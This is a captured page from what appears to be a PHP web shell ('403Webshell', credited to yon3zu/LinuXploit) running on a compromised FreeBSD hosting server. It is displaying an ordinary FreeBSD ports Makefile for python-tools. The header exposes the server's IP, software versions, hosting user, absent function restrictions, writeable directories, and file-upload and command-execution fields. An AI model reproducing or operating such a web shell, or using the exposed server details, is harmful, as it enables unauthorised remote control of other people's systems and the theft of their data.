403Webshell
Server IP : 82.208.35.60  /  Your IP : 216.73.216.89
Web Server : Apache/2.4.55 (FreeBSD) OpenSSL/1.1.1q-freebsd PHP/7.3.31
System : FreeBSD server7.d2m.cz 12.4-RELEASE-p9 FreeBSD 12.4-RELEASE-p9 GENERIC amd64
User : studiokobylisy_cz ( 1008)
PHP Version : 7.3.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/ports/lang/python-tools/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/ports/lang/python-tools/Makefile
PORTNAME=	python-tools
DISTVERSION=	${PYTHON_DISTVERSION}
PORTREVISION=	1
CATEGORIES=	lang python devel
MASTER_SITES=	PYTHON/ftp/python/${DISTVERSION}
PKGNAMEPREFIX=	${PYTHON_PKGNAMEPREFIX}
DISTNAME=	Python-${DISTVERSION}

MAINTAINER=	python@FreeBSD.org
COMMENT=	Supplementary tools for the Python language

LICENSE=	PSFL

PORTSCOUT=	ignore:1

USES=		python:3.6+ shebangfix tar:xz
USE_PYTHON=	flavors concurrent
NO_BUILD=	yes
NO_ARCH=	yes

DIST_SUBDIR=	python
DISTINFO_FILE=	${.CURDIR}/../python${PYTHON_SUFFIX}/distinfo
WRKSRC_SUBDIR=		Tools/scripts

SCRIPT_FILES=	byteyears copytime crlf dutree \
		lfcr ptags untabify
PYLIB_FILES=	tabnanny timeit
PLIST_FILES=	${SCRIPT_FILES:C|^|bin/|} ${PYLIB_FILES:C|^|bin/|}

SHEBANG_FILES=	${SCRIPT_FILES:C|$|.py|} \
		${PYLIB_FILES:C|.*|../../Lib/&.py|}

.include <bsd.port.pre.mk>

.if ${PYTHON_REL} < 30900
SCRIPT_FILES+=	checkpyc
.endif

do-install:
.for fname in ${SCRIPT_FILES}
	${INSTALL_SCRIPT} ${INSTALL_WRKSRC}/${fname}.py \
		${STAGEDIR}${PREFIX}/bin/${fname}
.endfor
.for fname in ${PYLIB_FILES}
	${INSTALL_SCRIPT} ${INSTALL_WRKSRC}/../../Lib/${fname}.py \
		${STAGEDIR}${PREFIX}/bin/${fname}
.endfor

.include <bsd.port.post.mk>

Youez - 2016 - github.com/yon3zu
LinuXploit